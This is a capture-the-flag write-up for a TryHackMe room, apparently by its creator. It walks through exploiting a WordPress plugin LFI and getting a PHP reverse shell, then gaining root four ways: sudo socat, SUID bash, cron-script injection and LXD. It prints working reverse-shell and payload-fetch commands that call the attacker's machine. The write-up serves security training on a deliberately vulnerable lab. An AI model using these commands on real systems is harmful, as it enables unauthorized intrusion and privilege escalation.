Source: TryHackMe
Room: All in One https://tryhackme.com/room/allinonemj
Difficulty: Easy/Medium
Creator: Me, i7m4d
This box’s intention is to help you practice several ways in exploiting a system. There is few intended paths to exploit it and few unintended paths to get root.
What you will see:
- Enumeration
- Decryption
- Reverse shell from wordpress
- Finding hidden password
- Exploiting LFI
- Privilege escalation using SUID
- Privilege escalation using cron job
- Privilege escalation using LXD
Enumeration:
First step in almost every box, running an nmap scan.
Command: nmap -p- -A -T4 (ip)
As shown in the nmap scan, There are three open ports:
21: ftp
22: SSH
80: web-server
FTP Port 21:
We can log into ftp using the username and password as Anonymous as shown in the nmap results.
Tip: You can directly log in using only the username Anonymous and hit Enter when prompted for the password.
Command: ftp (ip)
There is nothing useful in FTP, lets move on
Web Port 80:
First thing first, lets run a dir scan and check if there is any hidden directories
Command: gobuster dir -w (wordlist) -u (url)
As shown, we have found two directories:
Wordpress and Hackathons
Heading into the Hackathons page says something about hating the smell of vinegar, looking at the page source reveals an encoded text. The hint in the page might meant to use vigenere decoding to decrpt the text plus using the keyword under the encoded text as a key to decode it. 💭 💭 💭
And yes ! we were able to decrpt it and got what looks like a password, we will leave it there for now. By the way, I have tried to ssh using the password found yet it was incorrect🤔.
Accessing Wordpress obviously gave us and wordpress page, let us run wpscan to check for any vulnerabilities and enumerate users.
Command: wpscan — url (ip)/wordpress -e u
Command: wpscan — url (ip)/wordpress -e ap
- e enumerate
- u users
- ap all plugins
Looking at the results, we find two vulnerabilities and a username:
- Mail Masta which is LFI (Local File Inclusion)
Source: https://www.exploit-db.com/exploits/40290
2. Reflex Gallery (Arbitary File Upload)
Source: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
3. A username which is elyana
Exploitation:
Method 1💭:
Mail Masta (LFI):
The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a “dynamic file inclusion” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.
To test for LFI we will first try to see if we can access users accounts file:
http://ip/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
And yes this was executed successfully and we are able to see the contents of /etc/passwd.
Now let us try and get the database’s config file using:
We got the config file however it is encoded in base64, decoding it reveals the wordpress username and password:
Now we can just head and log into the wordpress and get a php reverse shell. To do so, we will go to Appearance > Theme Editor > On the right side click on 404 Template and paste our php reverse shell code.
Lets us run the file from where it is stored and start netcat to listen for incoming connections
Executing the file:
http://ip/wordpress/wp-content/themes/twentytwenty/404.php
Command to start netcat: nc -nlvp 9001
We got a shell !!!
Spawn a better shell using: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Method 2 (Metasploit)💭:
Reflex Gallery (File upload)
I will leave this up to you to try and exploit it the easier way using metasploit frame work.
Privilege Escalation to User:
Now that we have got a shell, lets grab our user.txt !!!
Urm🤔, I guess we cant access user.txt as we do not have permission yet. However, there is a hint file saying that elyana’s password is hidden somewhere on the system.
To find it, we will run a find command to see if she owns any file or directory:
Command: find / -user elyana -type f 2>&1 | grep -v “Permission” | grep -v “No such”
Looks like there is file called private.txt, reading it gives us the password of elyana’s user account.😍
Using the password found we were able to switch to elyana’s account. But what can we do more while we own elyana?
Checking elyana’s id shows that she is in sudo and lxd group. This is interesting!🤯
SSH
Now that we have the user’s password we can directly ssh into it and continue with our privilege escalation.
Privilege Escalation to root:
Method 1💭:
Anyways for now, running sudo -l says that when we correctly execute /usr/bin/socat we will get a shell as root. Lets do it !
In our machine we will run this command: socat file:`tty`,raw,echo=0 tcp-listen:(port)
In elyana’s machine we will run this command: sudo socat tcp-connect:(your machine’s ip):(port) exec:bash,pty,stderr,setsid,sigint,sane
And we got rooooooot 😍!!
Method 2💭:
Running LinEum script we have found some interesting SUID binaries that when we execute them we will get a shell as root.
Manually looking at SUID binaries using the command: find / -perm -u=s -type f 2>/dev/null
The second one we were able to do it successfully, lets try the first one now !
Btw, you can look for almost any SUID binaries from GTFOBins and it will provide you with excellent explanation on how you can priv esc using SUID binaries.
Source: https://gtfobins.github.io/
We will run this cute short command that we give us root access, because in the permissions it is -rwsr-sr-x in other words, we can execute it and get root.
Command: /bin/bash -p
And once again we are ROOOOOOOOT 😍😍!
Method 3💭:
In this method, we will get a reverse shell as root. This is possible because there is a bash script owned by root that executes every minute. We can verify it by checking the crontab.
Command: cat /etc/crontab
Looking at the script, it does not really do nothing however, we can insert again a cute short code using bash and we will get a reverse shell.
Inject this reverse shell code into the script: bash -i >& /dev/tcp/ip/port 0>&1
Our machine start netcat: nc -nlvp 9002
We are roooooooot’in again 😍😍😍!!!
Method 4💭:
Remember when we saw that elyana was in lxd group? Yup, it is this time when it comes in handy and we will exploit it like nothing !
To do so, first we will download lxd builder, create an image, upload the file to the victim using python server, import and execute the image.
Download the repo using git on your machine: git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
After creating it, upload it to the victim using python server.
On your machine: sudo python -m SimpleHTTPServer
On victim machine: go to the tmp directory and get the tar using
wget http://(your machine ip):8000/********.tar.gz
Now that we have got the file, we will add it as an image to LXD using:
lxc image import ./******************.tar.gz — alias alpine
List the lxc images to see if it was imported successfully like so:
lxc image list
Yup, it is imported. Now we will just have to execute it like so and then navigate to /mnt/root to see the system’s files:
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
/mnt/root/root
And guess what again? Yeah Yeah we just got root using LXD 😍😍😍😍 !!!
Finally the user.txt and root.txt are encoded using base64, go ahead decode them, and submit your flags 🚩🚩🚩!
This was a fun box to be honest and it contains some of the most important ways into exploiting a system. I enjoyed creating the box and writing up to it. It took me three to four days to complete everything so pardon me if I have done any silly mistakes.😎
Thank you for reading and I hope you have enjoyed this room and post 👏🏻 !
Another write up by me😎: https://medium.com/@i7m4d/bounty-hacker-write-up-tryhackme-4afca1389f5a
